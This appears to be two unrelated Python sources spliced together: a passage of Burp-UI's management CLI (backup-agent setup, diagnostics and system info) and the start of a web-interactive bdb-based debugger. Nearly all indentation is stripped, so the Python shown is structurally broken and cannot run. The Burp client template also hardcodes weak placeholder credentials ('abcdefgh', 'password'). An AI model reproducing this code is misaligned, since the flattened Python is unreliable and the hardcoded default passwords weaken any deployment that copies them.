if not os.path.exists(temp) or os.path.getsize(temp) == 0:
after = conf_orig
else:
with open(temp) as fil:
after = fil.readlines()
os.unlink(temp)
except:
pass
diff = difflib.unified_diff(
conf_orig, after, fromfile=orig, tofile="{}.new".format(orig)
)
out = ""
for line in diff:
out += _color_diff(line)
if out:
click.echo_via_pager(out)
if dry and monitor:
temp = monconf.options.filename
monconf.options.filename = mon_orig
after = []
try:
if not os.path.exists(temp) or os.path.getsize(temp) == 0:
after = monconf_orig
else:
with open(temp) as fil:
after = fil.readlines()
os.unlink(temp)
except:
pass
diff = difflib.unified_diff(
monconf_orig, after, fromfile=mon_orig, tofile="{}.new".format(mon_orig)
)
out = ""
for line in diff:
out += _color_diff(line)
if out:
click.echo_via_pager(out)
bconfcli = (
bconfcli
or app.conf.options["Burp"].get("bconfcli")
or getattr(app.client, "burpconfcli")
)
bconfsrv = (
bconfsrv
or app.conf.options["Burp"].get("bconfsrv")
or getattr(app.client, "burpconfsrv")
)
dest_bconfcli = bconfcli
is_burp_2_2_10_plus = False
listen_opt = "status_address"
if server_version and server_version >= BURP_LISTEN_OPTION:
is_burp_2_2_10_plus = True
listen_opt = "listen_status"
_, restore_port = listen.split(":")
if not os.path.exists(bconfcli):
clitpl = f"""
mode = client
port = {restore_port}
status_port = 4972
server = ::1
password = abcdefgh
cname = {client}
protocol = 1
pidfile = /tmp/burp.client.pid
syslog = 0
stdout = 1
progress_counter = 1
network_timeout = 72000
server_can_restore = 0
cross_all_filesystems=0
ca_burp_ca = /usr/sbin/burp_ca
ca_csr_dir = /etc/burp/CA-client
ssl_cert_ca = /etc/burp/ssl_cert_ca-client-{client}.pem
ssl_cert = /etc/burp/ssl_cert-bui-client.pem
ssl_key = /etc/burp/ssl_cert-bui-client.key
ssl_key_password = password
ssl_peer_cn = burpserver
include = /home
exclude_fs = sysfs
exclude_fs = tmpfs
nobackup = .nobackup
exclude_comp=bz2
exclude_comp=gz
"""
if dry:
(_, dest_bconfcli) = tempfile.mkstemp()
with open(dest_bconfcli, "w") as confcli:
confcli.write(clitpl)
parser = app.client.get_parser(assume)
confcli = Config(dest_bconfcli, parser, "srv")
confcli.set_default(dest_bconfcli)
confcli.parse()
if confcli.get("cname") != client:
confcli["cname"] = client
if confcli.get("server") != host:
confcli["server"] = host
c_status_port = (
confcli.get("status_port", [4972])[0]
if confcli.version >= BURP_BIND_MULTIPLE
else confcli.get("status_port", 4972)
)
c_server_port = (
confcli.get("port", [4971])[0]
if confcli.version >= BURP_BIND_MULTIPLE
else confcli.get("port", 4971)
)
if c_server_port != restore_port:
confcli["port"] = [restore_port]
if confcli.dirty:
if dry:
(_, dstfile) = tempfile.mkstemp()
else:
dstfile = bconfcli
confcli.store(conf=bconfcli, dest=dstfile, insecure=True)
if dry:
before = []
after = []
try:
with open(bconfcli) as fil:
before = fil.readlines()
except:
pass
try:
with open(dstfile) as fil:
after = fil.readlines()
os.unlink(dstfile)
except:
pass
if dest_bconfcli != bconfcli:
# the file did not exist
os.unlink(dest_bconfcli)
before = []
diff = difflib.unified_diff(
before, after, fromfile=bconfcli, tofile="{}.new".format(bconfcli)
)
out = ""
for line in diff:
out += _color_diff(line)
if out:
click.echo_via_pager(out)
if not os.path.exists(bconfsrv):
err("Unable to locate burp-server configuration, aborting!")
sys.exit(1)
confsrv = Config(bconfsrv, parser, "srv")
confsrv.set_default(bconfsrv)
confsrv.parse()
bind_index = -1
if host not in ["::1", "127.0.0.1"]:
bind = confsrv.get(listen_opt)
if is_burp_2_2_10_plus:
bind_list = list(bind)
for idx, line in enumerate(bind_list):
if line.endswith(":{}".format(c_status_port)):
bind = line.split(":")[0]
bind_index = idx
break
else:
warn(
"Unable to locate a 'listen_status' associated to your client "
"'status_port' ({})".format(c_status_port)
)
if (bind and bind not in [host, "::", "0.0.0.0"]) or not bind:
warn(
"It looks like your burp server is not exposing it's "
"status port in a way that is reachable by Burp-UI!"
)
info(
"You may want to set the '{0}' setting with "
"either '{1}{3}', '::{3}' or '0.0.0.0{3}' in the {2} file "
"in order to make Burp-UI work".format(
listen_opt,
host,
bconfsrv,
":{}".format(c_status_port) if is_burp_2_2_10_plus else "",
)
)
MAX_STATUS_CHILDREN = pool if pool is not None else 15
if not is_burp_2_2_10_plus:
s_port = confsrv.get("port", [4971])
if restore_port not in s_port:
confsrv["port"] = restore_port
else:
s_listen = confsrv.get("listen", [])
if listen not in s_listen:
confsrv["listen"] = listen
status_port = confsrv.get("status_port", [4972])
do_warn = False
if "max_status_children" not in confsrv:
info(
"We need to set the number of 'max_status_children'. "
"Setting it to {}.".format(MAX_STATUS_CHILDREN)
)
confsrv["max_status_children"] = MAX_STATUS_CHILDREN
elif confsrv.version and confsrv.version < BURP_BIND_MULTIPLE:
max_status_children = confsrv.get("max_status_children")
if not max_status_children or max_status_children < MAX_STATUS_CHILDREN:
confsrv["max_status_children"] = MAX_STATUS_CHILDREN
do_warn = True
else:
max_status_children = confsrv.get("max_status_children", [])
if not is_burp_2_2_10_plus:
for idx, value in enumerate(status_port):
if value == c_status_port:
bind_index = idx
break
        if bind_index >= 0 and len(max_status_children) > bind_index:
if max_status_children[bind_index] < MAX_STATUS_CHILDREN:
confsrv["max_status_children"][bind_index] = MAX_STATUS_CHILDREN
do_warn = True
else:
if max_status_children[-1] < MAX_STATUS_CHILDREN:
confsrv["max_status_children"][-1] = MAX_STATUS_CHILDREN
do_warn = True
if do_warn:
warn(
"We need to raise the number of 'max_status_children' to {}.".format(
MAX_STATUS_CHILDREN
)
)
if "restore_client" not in confsrv:
confsrv["restore_client"] = client
else:
restore = confsrv.getlist("restore_client")
if client not in restore:
confsrv["restore_client"].append(client)
confsrv["monitor_browse_cache"] = True
ca_client_dir = confsrv.get("ca_csr_dir")
if ca_client_dir and not os.path.exists(ca_client_dir):
try:
os.makedirs(ca_client_dir)
except IOError as exp:
_log(
'Unable to create "{}" dir: {}'.format(ca_client_dir, exp),
color="yellow",
err=True,
)
if confsrv.dirty:
if dry:
(_, dstfile) = tempfile.mkstemp()
else:
dstfile = bconfsrv
confsrv.store(conf=bconfsrv, dest=dstfile, insecure=True)
if dry:
before = []
after = []
try:
with open(bconfsrv) as fil:
before = fil.readlines()
except:
pass
try:
with open(dstfile) as fil:
after = fil.readlines()
os.unlink(dstfile)
except:
pass
diff = difflib.unified_diff(
before, after, fromfile=bconfsrv, tofile="{}.new".format(bconfsrv)
)
out = ""
for line in diff:
out += _color_diff(line)
if out:
click.echo_via_pager(out)
if confsrv.get("clientconfdir"):
bconfagent = os.path.join(confsrv.get("clientconfdir"), client)
else:
warn(
'Unable to find "clientconfdir" option, you will have to '
"setup the agent by your own"
)
bconfagent = os.devnull
if not os.path.exists(bconfagent):
agenttpl = """
password = abcdefgh
"""
if not dry:
with open(bconfagent, "w") as confagent:
confagent.write(agenttpl)
else:
before = []
after = ["{}\n".format(x) for x in agenttpl.splitlines()]
diff = difflib.unified_diff(
before, after, fromfile="None", tofile=bconfagent
)
out = ""
for line in diff:
out += _color_diff(line)
if out:
click.echo_via_pager(out)
else:
confagent = Config(bconfagent, parser, "cli")
confagent.set_default(bconfagent)
confagent.parse()
if confagent.get("password") != confcli.get("password"):
warn(
"It looks like the passwords in the {} and the {} files "
"mismatch. Burp-UI will not work properly until you fix "
"this".format(bconfcli, bconfagent)
)
@app.cli.command()
@click.option(
"-c",
"--client",
default="bui",
help="Name of the burp client that will be used by Burp-UI " '(defaults to "bui")',
)
@click.option(
"-h",
"--host",
default="::1",
help='Address of the status server (defaults to "::1")',
)
@click.option("-t", "--tips", is_flag=True, help="Show you some tips")
def diag(client, host, tips):
"""Check Burp-UI is correctly setup."""
if app.config["BACKEND"] not in ["burp2", "parallel"]:
err("Sorry, you can only diag the 'burp2' and the 'parallel' backends")
sys.exit(1)
if not app.config["STANDALONE"]:
err("Sorry, only the standalone mode is supported")
sys.exit(1)
try:
msg = app.load_modules()
except Exception as e:
msg = str(e)
if msg:
_die(msg, "diag")
from .misc.backend.utils.constant import BURP_LISTEN_OPTION
from .misc.parser.utils import Config
from .app import get_redis_server
if "Production" in app.conf.options and "redis" in app.conf.options["Production"]:
try:
# detect missing modules
import redis as redis_client # noqa
import celery # noqa
import socket
rhost, rport, _ = get_redis_server(app)
ret = -1
for res in socket.getaddrinfo(
rhost, rport, socket.AF_UNSPEC, socket.SOCK_STREAM
):
if ret == 0:
break
af, socktype, proto, _, sa = res
try:
s = socket.socket(af, socktype, proto)
except socket.error:
continue
try:
ret = s.connect_ex(sa)
except:
continue
if ret != 0:
warn("Unable to contact the redis server, disabling it")
except ImportError:
warn(
"Unable to activate redis & celery. Did you ran the "
"'pip install \"burp-ui[celery]\"' and "
"'pip install \"burp-ui[gunicorn-extra]\"' commands first?"
)
if (
"Production" in app.conf.options
and "database" in app.conf.options["Production"]
):
try:
from .ext.sql import db # noqa
except ImportError:
warn(
"It looks like some dependencies are missing. Did you ran "
"the 'pip install \"burp-ui[sql]\"' command first?"
)
section = "Burp"
if not app.conf.section_exists(section):
warn("Section [Burp] not found, looking for the old [Burp2] section instead.")
section = "Burp2"
if not app.conf.section_exists(section):
err("No [Burp*] section found at all!", err=False)
section = "Burp"
bconfcli = app.conf.options.get(section, {}).get("bconfcli") or getattr(
app.client, "burpconfcli"
)
bconfsrv = app.conf.options.get(section, {}).get("bconfsrv") or getattr(
app.client, "burpconfsrv"
)
try:
app.client.status()
except Exception as e:
if "Unable to spawn burp process" in str(e):
try:
app.client._spawn_burp(verbose=True)
except Exception as e:
msg = str(e)
else:
msg = str(e)
if msg:
err(msg, err=False)
if "could not connect" in msg:
warn(
"It looks like your burp-client can not reach your "
"burp-server. Please check both your 'server' setting in "
"your '{}' file and 'status_address' in your '{}' "
"file.".format(bconfcli, bconfsrv)
)
c_status_port = 4972
errors = False
if os.path.exists(bconfcli):
try:
parser = app.client.get_parser()
confcli = Config(bconfcli, parser, "srv")
confcli.set_default(bconfcli)
confcli.parse()
c_status_port = confcli.get("status_port", [4972])[0]
if confcli.get("cname") != client:
warn(
"The cname of your burp client does not match: "
"{} != {}".format(confcli.get("cname"), client)
)
errors = True
if confcli.get("server") != host:
warn(
"The burp server address does not match: "
"{} != {}".format(confcli.get("server"), host)
)
errors = True
except BUIserverException as exc:
err(str(exc))
errors = True
else:
err("No client conf file found: {} does not exist".format(bconfcli))
errors = True
if os.path.exists(bconfsrv):
try:
is_burp_2_2_10_plus = False
listen_opt = "status_address"
server_version = app.client.get_server_version()
if server_version and server_version >= BURP_LISTEN_OPTION:
is_burp_2_2_10_plus = True
listen_opt = "listen_status"
parser = app.client.get_parser()
confsrv = Config(bconfsrv, parser, "srv")
confsrv.set_default(bconfsrv)
confsrv.parse()
bind_index = -1
if host not in ["::1", "127.0.0.1"]:
bind = confsrv.get(listen_opt)
if is_burp_2_2_10_plus:
bind_list = list(bind)
for idx, line in enumerate(bind_list):
if line.endswith(":{}".format(c_status_port)):
bind = line.split(":")[0]
bind_index = idx
break
else:
warn(
"Unable to locate a 'listen_status' associated to your client "
"'status_port' ({})".format(c_status_port)
)
if (bind and bind not in [host, "::", "0.0.0.0"]) or not bind:
warn(
"It looks like your burp server is not exposing it's "
"status port in a way that is reachable by Burp-UI!"
)
info(
"You may want to set the '{0}' setting with "
"either '{1}{3}', '::{3}' or '0.0.0.0{3}' in the {2} file "
"in order to make Burp-UI work".format(
listen_opt,
host,
bconfsrv,
":{}".format(c_status_port) if is_burp_2_2_10_plus else "",
)
)
errors = True
status_port = confsrv.get("status_port", [4972])
if "max_status_children" not in confsrv:
do_warn = True
else:
max_status_children = confsrv.get("max_status_children", [])
do_warn = False
if not is_burp_2_2_10_plus:
for idx, value in enumerate(status_port):
if value == c_status_port:
bind_index = idx
break
                if bind_index >= 0 and len(max_status_children) > bind_index:
if max_status_children[bind_index] < 15:
do_warn = True
else:
if max_status_children[-1] < 15:
do_warn = True
if do_warn:
info(
"'max_status_children' is to low, you need to set it to "
"15 or more. Please edit your {} file.".format(bconfsrv)
)
errors = True
restore = []
if "restore_client" in confsrv:
restore = confsrv.getlist("restore_client")
if client not in restore:
warn(
"Your burp client is not listed as a 'restore_client'. "
"You won't be able to view other clients stats!"
)
errors = True
if "monitor_browse_cache" not in confsrv or not confsrv.get(
"monitor_browse_cache"
):
warn(
"For performance reasons, it is recommended to enable the "
"'monitor_browse_cache'."
)
errors = True
ca_client_dir = confsrv.get("ca_csr_dir")
if ca_client_dir and not os.path.exists(ca_client_dir):
try:
os.makedirs(ca_client_dir)
except IOError as exp:
_log(
'Unable to create "{}" dir: {}'.format(ca_client_dir, exp),
color="yellow",
err=True,
)
if confsrv.get("clientconfdir"):
bconfagent = os.path.join(confsrv.get("clientconfdir"), client)
else:
warn(
'Unable to find "clientconfdir" option. Something is wrong '
"with your setup."
)
bconfagent = "ihopethisfiledoesnotexistbecauseitisrelatedtoburpui"
if not os.path.exists(bconfagent) and bconfagent.startswith("/"):
warn("Unable to find the {} file.".format(bconfagent))
errors = True
else:
confagent = Config(bconfagent, parser, "cli")
confagent.set_default(bconfagent)
confagent.parse()
if confagent.get("password") != confcli.get("password"):
warn(
"It looks like the passwords in the {} and the {} files "
"mismatch. Burp-UI will not work properly until you fix "
"this.".format(bconfcli, bconfagent)
)
except BUIserverException as exc:
err(str(exc))
errors = True
else:
err(
"Unable to locate burp-server configuration: {} does not "
"exist.".format(bconfsrv)
)
errors = True
if errors:
if not tips:
err(
"Some errors have been found in your configuration. "
"Please make sure you ran this command with the right flags! "
"(see --help for details)."
)
else:
info(
"\n"
"Well, if you are sure about your settings, you can run the "
"following command to help you setup your Burp-UI agent. "
"(Note, the '--dry' flag is here to show you the "
"modifications that will be applied. Once you are OK with "
"those, you can re-run the command without the '--dry' flag):"
)
log(
' > bui-manage setup-burp --host="{}" --client="{}" --dry'.format(
host, client
)
)
else:
ok(
"Congratulations! It seems everything is alright. Burp-UI "
"should run without any issue now.",
)
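# Illustrative invocation of the diag command above (a sketch; the
# "bui-manage" entry point name is taken from the tip printed by the command
# itself):
#
#   $ bui-manage diag --client="bui" --host="::1" --tips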
@app.cli.command()
@click.option(
"-v",
"--verbose",
is_flag=True,
help="Dump parts of the config (Please double check no sensitive" " data leaked)",
)
@click.option(
"-l", "--load", is_flag=True, help="Load all configured modules for full summary"
)
def sysinfo(verbose, load):
"""Returns a couple of system informations to help debugging."""
from .desc import __release__, __version__
import platform
msg = None
if load:
try:
msg = app.load_modules()
except Exception as e:
msg = str(e)
backend = app.config["BACKEND"]
colors = {
"True": "green",
"False": "red",
}
embedded_ws = str(app.config["WITH_WS"])
available_ws = str(WS_AVAILABLE)
log(
"Python version: {}.{}.{}".format(
sys.version_info[0], sys.version_info[1], sys.version_info[2]
)
)
log("Burp-UI version: {} ({})".format(__version__, __release__))
log(
"OS: {}:{} ({})".format(
platform.system(), platform.release(), os.name
)
)
if platform.system() == "Linux":
log("Distribution: {} {} {}".format(*platform.dist()))
log("Single mode: {}".format(app.config["STANDALONE"]))
log("Backend: {}".format(backend))
log(
"WebSocket embedded: {}".format(
click.style(embedded_ws, fg=colors[embedded_ws])
)
)
log(
"WebSocket available: {}".format(
            click.style(available_ws, fg=colors[available_ws])
)
)
log("Config file: {}".format(app.config.conffile))
if load:
if not app.config["STANDALONE"] and not msg:
log("Agents:")
for agent, obj in app.client.servers.items():
client_version = server_version = "unknown"
try:
app.client.status(agent=agent)
client_version = app.client.get_client_version(agent=agent)
server_version = app.client.get_server_version(agent=agent)
except BUIserverException:
pass
alive = obj.ping()
if alive:
status = click.style("ALIVE", fg="green")
else:
status = click.style("DISCONNECTED", fg="red")
log(" - {} ({})".format(agent, status))
log(" * client version: {}".format(client_version))
log(" * server version: {}".format(server_version))
elif not msg:
server_version = "unknown"
try:
app.client.status()
server_version = app.client.get_server_version()
except BUIserverException:
pass
log("Burp client version: {}".format(app.client.client_version))
log("Burp server version: {}".format(server_version))
if verbose:
log(">>>>> Extra verbose informations:")
err("!!! PLEASE MAKE SURE NO SENSITIVE DATA GET EXPOSED !!!", err=False)
sections = [
"WebSocket",
"Burp",
"Production",
"Global",
]
sections.reverse()
for section in sections:
if section in app.config.options:
log()
log(" 8<{}BEGIN[{}]".format("-" * (67 - len(section)), section))
for key, val in app.config.options.get(section, {}).items():
log(" {} = {}".format(key, val))
log(" 8<{}END[{}]".format("-" * (69 - len(section)), section))
if load and msg:
_die(msg, "sysinfo")
|
|
#!/usr/bin/python2.4
# -*- coding: us-ascii -*-
# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
# $Id$
"""
Web-interactive Python debugger.
"""
import sys, os
import linecache
import bdb
import re
try:
from repr import Repr
except ImportError:
from reprlib import Repr
# Create a custom safe Repr instance and increase its maxstring.
# The default of 30 truncates error messages too easily.
_repr = Repr()
_repr.maxstring = 200
_repr.maxother = 50
_saferepr = _repr.repr
DebuggerQuit = bdb.BdbQuit
def find_function(funcname, filename):
cre = re.compile(r'def\s+%s\s*[(]' % funcname)
try:
fp = open(filename)
except IOError:
return None
# consumer of this info expects the first line to be 1
lineno = 1
answer = None
while 1:
line = fp.readline()
if line == '':
break
if cre.match(line):
answer = funcname, filename, lineno
break
lineno = lineno + 1
fp.close()
return answer
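# Illustrative use of find_function (a sketch; the path is hypothetical): it
# locates the 'def' line of a function so a breakpoint can be placed on it.
#
#   answer = find_function('checkline', '/path/to/module.py')
#   # -> ('checkline', '/path/to/module.py', lineno) or None when not found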
def lookupmodule(filename):
"""Helper function for break/clear parsing."""
root, ext = os.path.splitext(filename)
if ext == '':
filename = filename + '.py'
if os.path.isabs(filename):
return filename
for dirname in sys.path:
while os.path.islink(dirname):
dirname = os.readlink(dirname)
fullname = os.path.join(dirname, filename)
if os.path.exists(fullname):
return fullname
return None
def checkline(filename, lineno, ui):
"""Return line number of first line at or after input
argument such that if the input points to a 'def', the
returned line number is the first
non-blank/non-comment line to follow. If the input
points to a blank or comment line, return 0. At end
of file, also return 0."""
line = linecache.getline(filename, lineno)
if not line:
ui.Print('*** End of file')
return 0
line = line.strip()
# Don't allow setting breakpoint at a blank line
if (not line or (line[0] == '#') or
(line[:3] == '"""') or line[:3] == "'''"):
ui.Print('*** Blank or comment')
return 0
# When a file is read in and a breakpoint is at
# the 'def' statement, the system stops there at
# code parse time. We don't want that, so all breakpoints
# set at 'def' statements are moved one line onward
if line[:3] == 'def':
instr = ''
brackets = 0
while 1:
skipone = 0
for c in line:
if instr:
if skipone:
skipone = 0
elif c == '\\':
skipone = 1
elif c == instr:
instr = ''
elif c == '#':
break
elif c in ('"',"'"):
instr = c
elif c in ('(','{','['):
brackets = brackets + 1
elif c in (')','}',']'):
brackets = brackets - 1
lineno = lineno+1
line = linecache.getline(filename, lineno)
if not line:
ui.Print('*** end of file')
return 0
line = line.strip()
if not line: continue # Blank line
if brackets <= 0 and line[0] not in ('#','"',"'"):
break
return lineno
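# Sketch of how checkline is used by the breakpoint commands below ("ui" is
# any object exposing a Print() method, such as the WebUI used by Debugger):
#
#   lineno = checkline('/path/to/module.py', 10, ui)
#   if lineno:
#       # line 10 was a 'def' or a real statement; lineno is the first
#       # executable line at or after it, suitable for set_break()
#       pass
#   else:
#       # line 10 was blank, a comment, or past the end of the file
#       pass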
class Debugger(bdb.Bdb):
def reset(self):
bdb.Bdb.reset(self) # old style class
self.forget()
self._ui = WebUI()
def _expansions(self, c):
if c == "S": # current frame over total frames in backtrace
return "%s/%s" % (self.curindex+1, len(self.stack))
def forget(self):
self.lineno = None
self.stack = []
self.curindex = 0
self.curframe = None
def setup(self, f, t):
self.forget()
self.stack, self.curindex = self.get_stack(f, t)
self.curframe = self.stack[self.curindex][0]
# Override Bdb methods
def set_trace(self, frame=None, start=0):
"""Start debugging from `frame`, or `start` frames back from
caller's frame.
If frame is not specified, debugging starts from caller's frame.
"""
if frame is None:
frame = sys._getframe().f_back
self.reset()
if start:
start = int(start)
while start > 0 and frame:
frame = frame.f_back
start -= 1
while frame:
frame.f_trace = self.trace_dispatch
self.botframe = frame
frame = frame.f_back
self.set_step()
sys.settrace(self.trace_dispatch)
def user_call(self, frame, argument_list):
"""This method is called when there is the remote possibility
that we ever need to stop in this function."""
if self.stop_here(frame):
self._ui.printf('%g--Call--%N')
self.interaction(frame, None)
def user_line(self, frame):
"""This function is called when we stop or break at this line."""
self.interaction(frame, None)
def user_return(self, frame, return_value):
"""This function is called when a return trap is set here."""
frame.f_locals['__return__'] = return_value
self._ui.printf('%g--Return--%N')
self.interaction(frame, None)
def user_exception(self, frame, exc_tuple):
"""This function is called if an exception occurs,
but only if we are to stop at or just below this level."""
exc_type, exc_value, exc_traceback = exc_tuple
frame.f_locals['__exception__'] = exc_type, exc_value
if type(exc_type) == type(''):
exc_type_name = exc_type
else:
exc_type_name = exc_type.__name__
self.print_exc(exc_type_name, exc_value)
self.interaction(frame, exc_traceback)
# General interaction function
def interaction(self, frame, traceback):
self.setup(frame, traceback)
self.print_stack_entry(self.stack[self.curindex])
if self._parser is None:
cmd = DebuggerCommands(self._ui)
cmd._setup(self, "%GDebug%N:%S> ")
parser = DebuggerParser(cmd)
self._parser = parser
self._parser.interact()
self.forget()
def execline(self, line):
locals = self.curframe.f_locals
globals = self.curframe.f_globals
try:
code = compile(line + '\n', '<stdin>', 'single')
except:
t, v = sys.exc_info()[:2]
self._ui.printf('*** Could not compile: %%r%s%%N: %s' % (t, v))
else:
try:
exec(code, globals, locals)
except:
t, v = sys.exc_info()[:2]
self._ui.printf('*** %%r%s%%N: %s' % (t, v))
def go_up(self):
if self.curindex == 0:
return '*** Oldest frame'
self.curindex = self.curindex - 1
self.curframe = self.stack[self.curindex][0]
self.print_stack_entry(self.stack[self.curindex])
self.lineno = None
return None
def go_down(self):
if self.curindex + 1 == len(self.stack):
return '*** Newest frame'
self.curindex = self.curindex + 1
self.curframe = self.stack[self.curindex][0]
self.print_stack_entry(self.stack[self.curindex])
self.lineno = None
return None
def getval(self, arg):
return eval(arg, self.curframe.f_globals, self.curframe.f_locals)
def retval(self):
if '__return__' in self.curframe.f_locals:
return self.curframe.f_locals['__return__']
else:
return None
def defaultFile(self):
"""Produce a reasonable default."""
filename = self.curframe.f_code.co_filename
return filename
def lineinfo(self, identifier):
failed = (None, None, None)
# Input is identifier, may be in single quotes
idstring = identifier.split("'")
if len(idstring) == 1:
# not in single quotes
id = idstring[0].strip()
elif len(idstring) == 3:
# quoted
id = idstring[1].strip()
else:
return failed
if id == '':
return failed
parts = id.split('.')
# Protection for derived debuggers
if parts[0] == 'self':
del parts[0]
if len(parts) == 0:
return failed
# Best first guess at file to look at
fname = self.defaultFile()
if len(parts) == 1:
item = parts[0]
else:
# More than one part.
# First is module, second is method/class
f = lookupmodule(parts[0])
if f:
fname = f
item = parts[1]
answer = find_function(item, fname)
return answer or failed
# Print a traceback starting at the top stack frame.
# The most recently entered frame is printed last;
# this is different from dbx and gdb, but consistent with
# the Python interpreter's stack trace.
# It is also consistent with the up/down commands (which are
# compatible with dbx and gdb: up moves towards 'main()'
# and down moves towards the most recent stack frame).
def print_stack_trace(self):
try:
for frame_lineno in self.stack:
self.print_stack_entry(frame_lineno)
except KeyboardInterrupt:
pass
def print_stack_entry(self, frame_lineno):
frame, lineno = frame_lineno
if frame is self.curframe:
self._ui.Print(self._ui.format('%I>%N'), None)
else:
self._ui.Print(' ', None)
self._ui.Print(self.format_stack_entry(frame_lineno))
self.lineno = None
def format_stack_entry(self, frame_lineno):
frame, lineno = frame_lineno
filename = self.canonic(frame.f_code.co_filename)
s = []
s.append(self._ui.format("%%y%s%%N(%%Y%r%%N) in " % (filename, lineno)))
if frame.f_code.co_name:
s.append(frame.f_code.co_name)
else:
s.append("<lambda>")
if '__args__' in frame.f_locals:
args = frame.f_locals['__args__']
s.append(_saferepr(args))
else:
s.append('()')
if '__return__' in frame.f_locals:
rv = frame.f_locals['__return__']
s.append(self._ui.format('%I->%N'))
s.append(_saferepr(rv))
line = linecache.getline(filename, lineno)
if line:
s.append("\n ")
s.append(line.strip())
return "".join(s)
def print_exc(self, ex, val):
uif = self._ui.format
self._ui.Print(uif('%R'), ex, uif('%N:'), str(val))
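# Minimal usage sketch for the Debugger class above (it assumes the
# surrounding package provides the WebUI, DebuggerParser and CLI objects
# referenced in reset() and interaction()):
#
#   def buggy():
#       x = 1
#       Debugger().set_trace()   # start debugging from the caller's frame
#       return x / 0
#
# As with pdb.set_trace(), execution stops after the call and the interactive
# command loop (DebuggerCommands below) takes over.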
class DebuggerCommands(CLI.BaseCommands):
def _setup(self, obj, prompt=None):
self._dbg = obj # the debugger object
self._obj = obj # for base class
if prompt:
self._environ["PS1"] = str(prompt)
self._reset_scopes()
def finalize(self):
self._dbg.set_quit()
def default_command(self, argv):
line = " ".join(argv)
self._dbg.execline(line)
def execute(self, argv):
"""execute <statement>
Execute <statement> in current frame context."""
line = " ".join(argv[1:])
self._dbg.execline(line)
def brk(self, argv):
"""brk [-t] [breakpoint] ([file:]lineno | function) [, condition]
With a line number argument, set a break there in the current
file. With a function name, set a break at first executable line
of that function. Without argument, list all breaks. If a second
argument is present, it is a string specifying an expression
which must evaluate to true before the breakpoint is honored.
The line number may be prefixed with a filename and a colon,
to specify a breakpoint in another file (probably one that
hasn't been loaded yet). The file is searched for on sys.path;
the .py suffix may be omitted."""
temporary = False
opts, longopts, args = self.getopt(argv, "t")
for opt, arg in opts:
if opt == "-t":
temporary = True
if not args:
if self._dbg.breaks: # There's at least one
self._print("Num Type Disp Enb Where")
for bp in bdb.Breakpoint.bpbynumber:
if bp:
bp.bpprint()
return
# parse arguments; comma has lowest precedence
# and cannot occur in filename
arg = " ".join(args)
filename = None
lineno = None
cond = None
comma = arg.find(',')
if comma > 0:
# parse stuff after comma: "condition"
cond = arg[comma+1:].lstrip()
arg = arg[:comma].rstrip()
# parse stuff before comma: [filename:]lineno | function
colon = arg.rfind(':')
if colon >= 0:
filename = arg[:colon].rstrip()
f = lookupmodule(filename)
if not f:
self._print('*** ', repr(filename), 'not found from sys.path')
return
else:
filename = f
arg = arg[colon+1:].lstrip()
try:
lineno = int(arg)
except ValueError as msg:
self._print('*** Bad lineno:', arg)
return
else:
# no colon; can be lineno or function
try:
lineno = int(arg)
except ValueError:
try:
func = eval(arg,
self._dbg.curframe.f_globals,
self._dbg.curframe.f_locals)
except:
func = arg
try:
if hasattr(func, 'im_func'):
func = func.im_func
code = func.func_code
lineno = code.co_firstlineno
filename = code.co_filename
except:
# last thing to try
(ok, filename, ln) = self._dbg.lineinfo(arg)
if not ok:
self._print('*** The specified object', repr(arg))
self._print('is not a function or was not found along sys.path.')
return
lineno = int(ln)
if not filename:
filename = self._dbg.defaultFile()
# Check for reasonable breakpoint
line = checkline(filename, lineno, self._ui)
if line:
# now set the break point
err = self._dbg.set_break(filename, line, temporary, cond)
if err:
self._print('***', err)
else:
bp = self._dbg.get_breaks(filename, line)[-1]
self._print("Breakpoint %d at %s:%d" % (bp.number, bp.file, bp.line))
def enable(self, argv):
"""enable bpnumber [bpnumber ...]
Enables the breakpoints given as a space separated list of
bp numbers."""
for i in argv[1:]:
try:
i = int(i)
except ValueError:
self._print('Breakpoint index %r is not a number' % i)
continue
if not (0 <= i < len(bdb.Breakpoint.bpbynumber)):
self._print('No breakpoint numbered', i)
continue
bp = bdb.Breakpoint.bpbynumber[i]
if bp:
bp.enable()
def disable(self, argv):
"""disable bpnumber [bpnumber ...]
Disables the breakpoints given as a space separated list of
bp numbers."""
for i in argv[1:]:
try:
i = int(i)
except ValueError:
self._print('Breakpoint index %r is not a number' % i)
continue
if not (0 <= i < len(bdb.Breakpoint.bpbynumber)):
self._print('No breakpoint numbered', i)
continue
bp = bdb.Breakpoint.bpbynumber[i]
if bp:
bp.disable()
def condition(self, argv):
"""condition bpnumber str_condition
str_condition is a string specifying an expression which
must evaluate to true before the breakpoint is honored.
If str_condition is absent, any existing condition is removed;
i.e., the breakpoint is made unconditional."""
bpnum = int(argv[1].strip())
try:
cond = argv[2]
except:
cond = None
bp = bdb.Breakpoint.bpbynumber[bpnum]
if bp:
bp.cond = cond
if not cond:
self._print('Breakpoint', bpnum, 'is now unconditional.')
def ignore(self, argv):
"""ignore bpnumber count
Sets the ignore count for the given breakpoint number. A breakpoint
becomes active when the ignore count is zero. When non-zero, the
count is decremented each time the breakpoint is reached and the
breakpoint is not disabled and any associated condition evaluates
to true."""
bpnum = int(argv[1].strip())
try:
count = int(argv[2].strip())
except:
count = 0
bp = bdb.Breakpoint.bpbynumber[bpnum]
if bp:
bp.ignore = count
if count > 0:
reply = 'Will ignore next '
if count > 1:
reply = reply + '%d crossings' % count
else:
reply = reply + '1 crossing'
self._print(reply + ' of breakpoint %d.' % bpnum)
else:
self._print( 'Will stop next time breakpoint', bpnum, 'is reached.')
def clear(self, argv):
"""clear ...
Three possibilities, tried in this order:
clear -> clear all breaks, ask for confirmation
clear file:lineno -> clear all breaks at file:lineno
clear bpno bpno ... -> clear breakpoints by number
With a space separated list of breakpoint numbers, clear
those breakpoints. Without argument, clear all breaks (but
first ask confirmation). With a filename:lineno argument,
clear all breaks at that line in that file.
Note that the argument is different from previous versions of
the debugger (in python distributions 1.5.1 and before) where
a linenumber was used instead of either filename:lineno or
breakpoint numbers."""
if len(argv) == 1:
reply = self._ui.yes_no('Clear all breaks? ')
if reply:
self._dbg.clear_all_breaks()
return
arg = " ".join(argv[1:])
if ':' in arg:
# Make sure it works for "clear C:\foo\bar.py:12"
i = arg.rfind(':')
filename = arg[:i]
arg = arg[i+1:]
try:
lineno = int(arg)
except:
err = "Invalid line number (%s)" % arg
else:
err = self._dbg.clear_break(filename, lineno)
if err:
self._print('***', err)
return
numberlist = arg.split()
for i in numberlist:
err = self._dbg.clear_bpbynumber(i)
if err:
self._print('***', err)
